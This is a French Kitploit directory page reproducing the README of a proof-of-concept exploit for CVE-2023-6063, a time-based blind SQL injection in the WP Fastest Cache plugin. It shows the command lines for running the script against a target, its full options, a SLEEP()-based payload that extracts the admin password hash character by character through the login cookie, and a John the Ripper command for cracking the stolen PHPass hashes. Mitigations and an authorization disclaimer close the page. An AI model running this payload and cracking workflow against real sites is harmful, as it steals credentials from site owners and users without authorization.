Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-6063-PoC — Une preuve de concept pour CVE-2023-6063, une vulnérabilité d'injection SQL aveugle basée sur le temps dans WP Fastest Cache ≤1.2.2. | Kitploit
Outils/GitHubGitHub/incommatose/cve-2023-6063-poc
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

Une preuve de concept pour CVE-2023-6063, une vulnérabilité d'injection SQL aveugle basée sur le temps dans WP Fastest Cache ≤1.2.2.

Voir le dépôt
2139il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC pour CVE-2023-6063: WP Fastest Cache 1.2.2 Injection SQL aveugle non authentifiée

Static Badge Static Badge Static Badge

Une preuve de concept pour CVE-2023-6063, une vulnérabilité d'injection SQL aveugle basée sur le temps dans WP Fastest Cache ≤1.2.2. Extrait les mots de passe hachés (user_pass) et les e-mails (user_email) de la table wp_users en abusant du cookie wordpress_logged_in.

Fonctionnalités

  • Exfiltration de données basée sur le temps (caractère par caractère) via les délais SLEEP().
  • Prend en charge les cookies personnalisés, les noms d'utilisateur cibles et la validation de hachage.

Ce script extrait :

  • ☑️ Hachages de mots de passe WordPress (MD5/PHPass).
  • ☑️ Adresses e-mail associées.
  • Arguments CLI pour des tests flexibles (--just-hash, --just-email, --debug).

Utilisation

Installer les dépendances (si elles ne sont pas installées) :

root@kitploit:~
pip install -r requirements.txt

Utilisation de base :

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

Options complètes :

root@kitploit:~
  -h, --help            show this help message and exit
  -u URL, --url URL     Full URL to Wordpress for testing CVE-2023-6063
  --username USERNAME   Define a user to extract its hashed pass
  -d DELAY, --delay DELAY
                        Time for wait web response default 5, minimum 2
  -H HASH, --hash HASH  Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
  --domain DOMAIN       Name of the domain for email validation
  -c COOKIE, --cookie COOKIE
                        Specify a cookie name if it's different on your context
  --status-code STATUS_CODE
                        Use a specific positive status code, default 200
  --debug               More verbosity
  --just-hash           Just extract hashed password
  --just-email          Just extract email value for a user

💻 Demo

Ceci est une démo pour l'utilisateur admin

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

Lorsque les hachages de mots de passe sont divulgués, utilisez john ou hashcat pour les déchiffrer avec l'algorithme PHPass si le mot de passe est vulnérable.

Exemple avec John :

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ Détails techniques

📖 Description de la vulnérabilité

Le plugin WP Fastest Cache (≤1.2.2) pour WordPress est vulnérable à une injection SQL aveugle non authentifiée via le cookie wordpress_logged_in. Les attaquants peuvent exploiter cette faille pour extraire des données sensibles (par exemple, hachages de mots de passe, adresses e-mail) de la table wp_users en utilisant des délais basés sur le temps (SLEEP()) dans les requêtes SQL.

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 Avertissement : Utilisez ces informations uniquement pour des tests de sécurité éthiques avec une autorisation appropriée. L'exploitation non autorisée est illégale.

  • CVE ID: CVE-2023-6063
  • Score de vulnérabilité : 7.5 (Élevé)
  • Type de vulnérabilité : Injection SQL (aveugle, basée sur le temps)
  • Logiciel affecté : WP Fastest Cache (Plugin WordPress) ≤ v1.2.2

🔍 Vecteur d'attaque

  • Exploitabilité : À distance (Aucune authentification requise)
  • Complexité de l'attaque : Faible (Exploitable via des requêtes HTTP forgées)

🔥 Impact :

  • Confidentialité : Élevée (Fuite des identifiants admin)
  • Intégrité : Aucun
  • Disponibilité : Aucune

📌 Versions affectées

  • WP Fastest Cache versions ≤1.2.2

🛡️ Atténuation

Mettez à niveau WP Fastest Cache vers une version >1.2.2.

  • Mettez à niveau vers WP Fastest Cache v1.2.3 ou version ultérieure.
  • Appliquez les règles WAF pour bloquer les charges utiles SQLi dans les cookies.
  • Désactivez le plugin s'il n'est pas utilisé.

📚 Références

  • NIST NVD Entry
  • WordPress Plugin Advisory
  • CVE Details

⚖️ Légal

  • Ce script est à des fins éducatives. Obtenez toujours une autorisation explicite avant de tester.
Télécharger l’outil